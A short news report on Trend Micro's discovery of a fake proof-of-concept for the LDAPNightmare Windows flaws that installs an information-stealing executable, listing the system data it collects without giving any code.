- Trend Micro Detects Malware Advertised as PoC Fork for Major Windows Vulnerability
- Malware acts as an information thief, taking over vital system information.
- These types of attacks are usually carried out by nation-states.
Experts have warned that cybercriminals are targeting security researchers with fake proof-of-concept (PoC) solutions, trying to infect their computers with data-stealing malware.
Cybersecurity researchers Trend Micro, who detected the new campaign in January 2025, noted how criminals would publish a PoC for a popular and critical severity vulnerability, to draw the attention of the cybersecurity industry.
Researchers would then take the PoC for analysis and end up installing a piece of malware in its place.
Steal vital information from PC
In this particular case, the criminals were announcing a fork of an existing, legitimate PoC for LDAPNightmare, a vulnerability discovered in early January and consisting of two flaws, CVE-2024-49112 and CVE-2024-49113.
The first serves as bait here, as it is a severity 9.8/10 flaw, which affects Windows’ Lightweight Directory Access Protocol (LDAP) and allows remote code execution (RCE).
In her article, Trend Micro researcher Sarah Pearl Camiling said that “both vulnerabilities were considered very important due to the widespread use of LDAP in Windows environments.” Both flaws were fixed in December 2024, via the Patch Tuesday cumulative update.
In the fake PoC, the criminals replaced some of the legitimate files with an executable called “poc.exe”. This would implement a PowerShell script which would in turn implement another script that steals data from the computer.
This is what the information thief is looking for:
– computer information
– List of processes
– Directory lists (Downloads, Recents, Documents and Desktop)
– Network IP
– Network adapters
– Updates installed
This type of attack is nothing new: criminals have been observed regularly applying the same tactics in the past.
Although this was not hinted at in the report, these types of attacks are often carried out by state actors, in an attempt to gather vital intelligence on the cybersecurity practices of large technology organizations, government companies, critical infrastructure actors, and more.
Through The Registry
